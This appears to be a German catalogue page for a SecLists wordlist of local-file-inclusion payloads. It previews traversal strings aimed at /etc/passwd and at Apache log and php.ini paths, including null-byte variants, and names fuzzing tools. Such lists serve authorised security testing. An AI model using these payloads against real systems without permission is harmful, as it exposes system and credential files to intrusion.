Skip to content
Web-Inhalte31.2 KB

LFI Linux and Windows Paths (SecLists)

Local-File-Inclusion-Payloads, die sowohl Linux- als auch Windows-Log- und Konfigurationsdateien angreifen, mit Traversal- und Null-Byte-Varianten.

Quelle ansehen
Größe
31.2 KB
Kategorie
Web-Inhalte
Quelle
danielmiessler/SecLists
Lizenz
MIT
Empfohlene Tools
ffufwfuzzferoxbuster

Vorschau

Die ersten 15 Einträge. Lade die vollständige Liste (31.2 KB) herunter oder kopiere sie über die Schaltflächen oben.

>head lfi-linux-windows-1n3.txt31.2 KB
/..\..\\..\..\\..\..\\..\..\\\/etc/passwd
/apache/logs/access.log
/apache/logs/access.log 
/apache/logs/access.log%00
/apache/logs/error.log
/apache/logs/error.log 
/apache/logs/error.log%00
/apache2/logs/access.log
/apache2/logs/access.log 
/apache2/logs/access.log%00
/apache2/logs/error.log
/apache2/logs/error.log 
/apache2/logs/error.log%00
/apache\php\php.ini
/apache\php\php.ini 

Local-File-Inclusion-Payloads, die sowohl Linux- als auch Windows-Log- und Konfigurationsdateien angreifen, mit Traversal- und Null-Byte-Varianten.

Diese Liste ist auf Web-Content- und Verzeichnis-Discovery ausgerichtet. Sie umfasst etwa 31.2 KB und harmoniert gut mit Tools wie ffuf, wfuzz, feroxbuster. Wählen Sie die kleinste Liste, die zu Ihrem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online-Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger ins Gewicht fällt.

Sie können die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in Ihre Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt aus ihrer ursprünglichen Quelle auf GitHub bereitgestellt.

Stammt aus danielmiessler/SecLists und wird unter MIT bereitgestellt. Verwenden Sie Wortlisten ausschließlich gegen Systeme, zu deren Test Sie ausdrücklich autorisiert sind.